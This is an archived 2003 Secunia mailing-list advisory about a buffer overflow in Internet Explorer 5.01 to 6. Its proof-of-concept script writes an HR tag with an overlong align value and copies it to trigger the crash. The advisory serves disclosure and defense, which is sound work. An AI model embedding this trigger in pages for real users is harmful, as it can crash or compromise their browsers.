|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[sec-adv] Internet Explorer Horizontal Rule Buffer Overflow Vulnerability
From: Secunia Security Advisories (sec-adv
secunia.com)
Date: Wed Jun 25 2003 - 15:11:08 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
TITLE:
Internet Explorer Horizontal Rule Buffer Overflow Vulnerability
READ ONLINE:
http://www.secunia.com/advisories/9113/
CRITICAL:
Highly critical
IMPACT:
DoS, System access
WHERE:
From remote
SOFTWARE:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
DESCRIPTION:
A vulnerability has been identified in Internet Explorer (IE), which
potentially can be exploited by malicious people to compromise a
user's system.
The vulnerability is caused due to a boundary error, which can be
exploited to cause a buffer overflow via a HTML document containing
specially crafted script code.
Successful exploitation may crash the user's browser or allow
execution of arbitrary code on the user's system with the user's
privileges, but requires that the user is tricked into viewing a
malicious HTML document.
The following example was provided in the original advisory. It opens
a new window and then adds a horizontal rule (using <HR> tag) with an
overly long argument supplied to the "align" attribute. The content
is then copied and the window is closed, which triggers the
overflow.
<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>
SOLUTION:
Disable Active scripting support.
REPORTED BY / CREDITS:
Digital Scream
----------------------------------------------------------------------
Secunia recommends that you verify all advisories you receive, by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Contact details:
Web : http://www.secunia.com/
E-mail : supportsecunia.com
Tel : +44 (0) 20 7016 2693
Fax : +44 (0) 20 7637 0419
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
----------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]